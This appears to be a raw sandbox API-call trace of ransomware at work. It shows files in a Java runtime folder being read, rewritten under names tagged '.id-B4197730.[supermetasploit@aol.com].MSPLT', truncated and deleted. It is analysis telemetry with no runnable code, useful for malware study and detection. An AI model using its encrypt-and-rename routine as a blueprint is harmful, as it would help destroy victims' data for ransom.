[0303.366] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties") returned 71 [0303.366] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties") returned 71 [0303.366] lstrlenW (lpString=".doc") returned 4 [0303.366] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0303.366] lstrlenW (lpString=".docx") returned 5 [0303.366] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0303.366] lstrlenW (lpString=".pdf") returned 4 [0303.366] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0303.366] lstrlenW (lpString=".xls") returned 4 [0303.366] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0303.366] lstrlenW (lpString=".xlsx") returned 5 [0303.366] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0303.366] lstrlenW (lpString=".ppt") returned 4 [0303.366] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0303.366] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties") returned 71 [0303.366] lstrlenW (lpString=".zip") returned 4 [0303.366] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0303.366] lstrlenW (lpString=".rar") returned 4 [0303.366] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0303.366] lstrlenW (lpString=".bz2") returned 4 [0303.366] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0303.366] lstrlenW (lpString=".7z") returned 3 [0303.366] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0303.366] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties") returned 71 [0303.366] lstrlenW (lpString=".dbf") returned 4 [0303.366] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0303.366] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties") returned 71 [0303.366] lstrlenW (lpString=".1cd") returned 4 [0303.366] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0303.366] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties") returned 71 [0303.366] lstrlenW (lpString=".jpg") returned 4 [0303.366] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0303.367] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0303.367] lstrlenW (lpString="jfxrt.jar") returned 9 [0303.367] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e4 [0303.367] GetFileSizeEx (in: hFile=0x4e4, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=18246297) returned 1 [0303.367] CloseHandle (hObject=0x4e4) returned 1 [0303.368] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar")) returned 0x20 [0303.368] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0303.368] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0303.368] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar") returned 52 [0303.368] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar") returned 52 [0303.368] lstrlenW (lpString=".doc") returned 4 [0303.368] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0303.368] lstrlenW (lpString=".docx") returned 5 [0303.368] lstrcmpiW (lpString1=".docx", lpString2="t.jar") returned -1 [0303.368] lstrlenW (lpString=".pdf") returned 4 [0303.368] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0303.369] lstrlenW (lpString=".xls") returned 4 [0303.369] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0303.369] lstrlenW (lpString=".xlsx") returned 5 [0303.369] lstrcmpiW (lpString1=".xlsx", lpString2="t.jar") returned -1 [0303.369] lstrlenW (lpString=".ppt") returned 4 [0303.369] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0303.369] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar") returned 52 [0303.369] lstrlenW (lpString=".zip") returned 4 [0303.369] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0303.369] lstrlenW (lpString=".rar") returned 4 [0303.369] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0303.369] lstrlenW (lpString=".bz2") returned 4 [0303.369] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0303.369] lstrlenW (lpString=".7z") returned 3 [0303.369] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0303.369] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar") returned 52 [0303.369] lstrlenW (lpString=".dbf") returned 4 [0303.369] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0303.369] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar") returned 52 [0303.369] lstrlenW (lpString=".1cd") returned 4 [0303.369] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0303.369] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar") returned 52 [0303.369] lstrlenW (lpString=".jpg") returned 4 [0303.369] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0303.369] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar") returned 52 [0303.369] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar") returned 52 [0303.369] lstrlenW (lpString=".doc") returned 4 [0303.369] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0303.370] lstrlenW (lpString=".docx") returned 5 [0303.370] lstrcmpiW (lpString1=".docx", lpString2="t.jar") returned -1 [0303.370] lstrlenW (lpString=".pdf") returned 4 [0303.370] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0303.370] lstrlenW (lpString=".xls") returned 4 [0303.370] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0303.370] lstrlenW (lpString=".xlsx") returned 5 [0303.370] lstrcmpiW (lpString1=".xlsx", lpString2="t.jar") returned -1 [0303.370] lstrlenW (lpString=".ppt") returned 4 [0303.370] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0303.370] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar") returned 52 [0303.370] lstrlenW (lpString=".zip") returned 4 [0303.370] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0303.370] lstrlenW (lpString=".rar") returned 4 [0303.370] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0303.370] lstrlenW (lpString=".bz2") returned 4 [0303.370] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0303.370] lstrlenW (lpString=".7z") returned 3 [0303.370] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0303.370] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar") returned 52 [0303.370] lstrlenW (lpString=".dbf") returned 4 [0303.370] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0303.370] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar") returned 52 [0303.370] lstrlenW (lpString=".1cd") returned 4 [0303.370] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0303.370] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar") returned 52 [0303.370] lstrlenW (lpString=".jpg") returned 4 [0303.370] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0303.371] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0303.371] lstrlenW (lpString="localedata.jar") returned 14 [0303.371] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\localedata.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e4 [0303.372] GetFileSizeEx (in: hFile=0x4e4, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=2204781) returned 1 [0303.372] CloseHandle (hObject=0x4e4) returned 1 [0303.372] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\localedata.jar")) returned 0x20 [0303.372] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\localedata.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0303.373] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\localedata.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\localedata.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0303.373] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar") returned 57 [0303.373] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar") returned 57 [0303.373] lstrlenW (lpString=".doc") returned 4 [0303.373] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0303.373] lstrlenW (lpString=".docx") returned 5 [0303.373] lstrcmpiW (lpString1=".docx", lpString2="a.jar") returned -1 [0303.373] lstrlenW (lpString=".pdf") returned 4 [0303.373] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0303.373] lstrlenW (lpString=".xls") returned 4 [0303.373] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0303.373] lstrlenW (lpString=".xlsx") returned 5 [0303.373] lstrcmpiW (lpString1=".xlsx", lpString2="a.jar") returned -1 [0303.373] lstrlenW (lpString=".ppt") returned 4 [0303.373] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0303.373] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar") returned 57 [0303.373] lstrlenW (lpString=".zip") returned 4 [0303.373] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0303.374] lstrlenW (lpString=".rar") returned 4 [0303.374] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0303.374] lstrlenW (lpString=".bz2") returned 4 [0303.374] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0303.374] lstrlenW (lpString=".7z") returned 3 [0303.374] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0303.374] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar") returned 57 [0303.374] lstrlenW (lpString=".dbf") returned 4 [0303.374] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0303.374] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar") returned 57 [0303.374] lstrlenW (lpString=".1cd") returned 4 [0303.374] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0303.374] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar") returned 57 [0303.374] lstrlenW (lpString=".jpg") returned 4 [0303.374] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0303.374] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar") returned 57 [0303.374] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar") returned 57 [0303.374] lstrlenW (lpString=".doc") returned 4 [0303.374] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0303.374] lstrlenW (lpString=".docx") returned 5 [0303.374] lstrcmpiW (lpString1=".docx", lpString2="a.jar") returned -1 [0303.374] lstrlenW (lpString=".pdf") returned 4 [0303.374] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0303.374] lstrlenW (lpString=".xls") returned 4 [0303.374] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0303.374] lstrlenW (lpString=".xlsx") returned 5 [0303.374] lstrcmpiW (lpString1=".xlsx", lpString2="a.jar") returned -1 [0303.374] lstrlenW (lpString=".ppt") returned 4 [0303.374] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0303.374] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar") returned 57 [0303.374] lstrlenW (lpString=".zip") returned 4 [0303.374] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0303.375] lstrlenW (lpString=".rar") returned 4 [0303.375] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0303.375] lstrlenW (lpString=".bz2") returned 4 [0303.375] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0303.375] lstrlenW (lpString=".7z") returned 3 [0303.375] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0303.375] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar") returned 57 [0303.375] lstrlenW (lpString=".dbf") returned 4 [0303.375] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0303.375] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar") returned 57 [0303.375] lstrlenW (lpString=".1cd") returned 4 [0303.375] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0303.375] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\localedata.jar") returned 57 [0303.375] lstrlenW (lpString=".jpg") returned 4 [0303.375] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0303.375] lstrcmpiW (lpString1=".0_144\\lib\\ext\\meta-index", lpString2=".MSPLT") returned -1 [0303.375] lstrlenW (lpString="meta-index") returned 10 [0303.375] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\meta-index"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e4 [0303.376] GetFileSizeEx (in: hFile=0x4e4, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=1461) returned 1 [0303.376] CloseHandle (hObject=0x4e4) returned 1 [0303.376] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\meta-index")) returned 0x20 [0303.376] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\meta-index.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0303.376] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\meta-index"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e4 [0303.377] SetFilePointerEx (in: hFile=0x4e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.377] SetFilePointerEx (in: hFile=0x4e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.377] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\meta-index.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f8 [0303.377] GetLastError () returned 0x0 [0303.377] ReadFile (in: hFile=0x4e4, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x5b5, lpOverlapped=0x0) returned 1 [0303.380] WriteFile (in: hFile=0x4f8, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x5c0, lpOverlapped=0x0) returned 1 [0303.381] ReadFile (in: hFile=0x4e4, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0303.381] WriteFile (in: hFile=0x4f8, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xe8, lpOverlapped=0x0) returned 1 [0303.381] SetEndOfFile (hFile=0x4f8) returned 1 [0303.382] CloseHandle (hObject=0x4f8) returned 1 [0303.384] SetFilePointerEx (in: hFile=0x4e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.384] SetEndOfFile (hFile=0x4e4) returned 1 [0303.776] CloseHandle (hObject=0x4e4) returned 1 [0303.777] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0303.959] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\meta-index")) returned 1 [0303.963] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index") returned 53 [0303.963] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index") returned 53 [0303.963] lstrlenW (lpString=".doc") returned 4 [0303.963] lstrcmpiW (lpString1=".doc", lpString2="ndex") returned -1 [0303.963] lstrlenW (lpString=".docx") returned 5 [0303.963] lstrcmpiW (lpString1=".docx", lpString2="index") returned -1 [0303.963] lstrlenW (lpString=".pdf") returned 4 [0303.963] lstrcmpiW (lpString1=".pdf", lpString2="ndex") returned -1 [0303.963] lstrlenW (lpString=".xls") returned 4 [0303.963] lstrcmpiW (lpString1=".xls", lpString2="ndex") returned -1 [0303.963] lstrlenW (lpString=".xlsx") returned 5 [0303.963] lstrcmpiW (lpString1=".xlsx", lpString2="index") returned -1 [0303.963] lstrlenW (lpString=".ppt") returned 4 [0303.963] lstrcmpiW (lpString1=".ppt", lpString2="ndex") returned -1 [0303.963] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index") returned 53 [0303.963] lstrlenW (lpString=".zip") returned 4 [0303.963] lstrcmpiW (lpString1=".zip", lpString2="ndex") returned -1 [0303.963] lstrlenW (lpString=".rar") returned 4 [0303.963] lstrcmpiW (lpString1=".rar", lpString2="ndex") returned -1 [0303.963] lstrlenW (lpString=".bz2") returned 4 [0303.963] lstrcmpiW (lpString1=".bz2", lpString2="ndex") returned -1 [0303.964] lstrlenW (lpString=".7z") returned 3 [0303.964] lstrcmpiW (lpString1=".7z", lpString2="dex") returned -1 [0303.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index") returned 53 [0303.964] lstrlenW (lpString=".dbf") returned 4 [0303.964] lstrcmpiW (lpString1=".dbf", lpString2="ndex") returned -1 [0303.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index") returned 53 [0303.964] lstrlenW (lpString=".1cd") returned 4 [0303.964] lstrcmpiW (lpString1=".1cd", lpString2="ndex") returned -1 [0303.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index") returned 53 [0303.964] lstrlenW (lpString=".jpg") returned 4 [0303.964] lstrcmpiW (lpString1=".jpg", lpString2="ndex") returned -1 [0303.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index") returned 53 [0303.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index") returned 53 [0303.964] lstrlenW (lpString=".doc") returned 4 [0303.964] lstrcmpiW (lpString1=".doc", lpString2="ndex") returned -1 [0303.964] lstrlenW (lpString=".docx") returned 5 [0303.964] lstrcmpiW (lpString1=".docx", lpString2="index") returned -1 [0303.964] lstrlenW (lpString=".pdf") returned 4 [0303.964] lstrcmpiW (lpString1=".pdf", lpString2="ndex") returned -1 [0303.964] lstrlenW (lpString=".xls") returned 4 [0303.964] lstrcmpiW (lpString1=".xls", lpString2="ndex") returned -1 [0303.964] lstrlenW (lpString=".xlsx") returned 5 [0303.964] lstrcmpiW (lpString1=".xlsx", lpString2="index") returned -1 [0303.964] lstrlenW (lpString=".ppt") returned 4 [0303.964] lstrcmpiW (lpString1=".ppt", lpString2="ndex") returned -1 [0303.964] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index") returned 53 [0303.964] lstrlenW (lpString=".zip") returned 4 [0303.964] lstrcmpiW (lpString1=".zip", lpString2="ndex") returned -1 [0303.964] lstrlenW (lpString=".rar") returned 4 [0303.965] lstrcmpiW (lpString1=".rar", lpString2="ndex") returned -1 [0303.965] lstrlenW (lpString=".bz2") returned 4 [0303.965] lstrcmpiW (lpString1=".bz2", lpString2="ndex") returned -1 [0303.965] lstrlenW (lpString=".7z") returned 3 [0303.965] lstrcmpiW (lpString1=".7z", lpString2="dex") returned -1 [0303.965] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index") returned 53 [0303.965] lstrlenW (lpString=".dbf") returned 4 [0303.965] lstrcmpiW (lpString1=".dbf", lpString2="ndex") returned -1 [0303.965] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index") returned 53 [0303.965] lstrlenW (lpString=".1cd") returned 4 [0303.965] lstrcmpiW (lpString1=".1cd", lpString2="ndex") returned -1 [0303.965] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\meta-index") returned 53 [0303.965] lstrlenW (lpString=".jpg") returned 4 [0303.965] lstrcmpiW (lpString1=".jpg", lpString2="ndex") returned -1 [0303.965] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0303.965] lstrlenW (lpString="sunpkcs11.jar") returned 13 [0303.965] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e4 [0303.990] GetFileSizeEx (in: hFile=0x4e4, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=251327) returned 1 [0303.990] CloseHandle (hObject=0x4e4) returned 1 [0303.990] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar")) returned 0x20 [0303.990] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0303.991] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e4 [0303.991] SetFilePointerEx (in: hFile=0x4e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.991] SetFilePointerEx (in: hFile=0x4e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.991] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x514 [0303.992] GetLastError () returned 0x0 [0303.992] ReadFile (in: hFile=0x4e4, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x3d5bf, lpOverlapped=0x0) returned 1 [0304.197] WriteFile (in: hFile=0x514, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x3d5c0, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x3d5c0, lpOverlapped=0x0) returned 1 [0304.206] ReadFile (in: hFile=0x4e4, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0304.206] WriteFile (in: hFile=0x514, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xee, lpOverlapped=0x0) returned 1 [0304.206] SetEndOfFile (hFile=0x514) returned 1 [0304.206] CloseHandle (hObject=0x514) returned 1 [0304.215] SetFilePointerEx (in: hFile=0x4e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0304.215] SetEndOfFile (hFile=0x4e4) returned 1 [0304.224] CloseHandle (hObject=0x4e4) returned 1 [0304.224] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0304.873] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar" 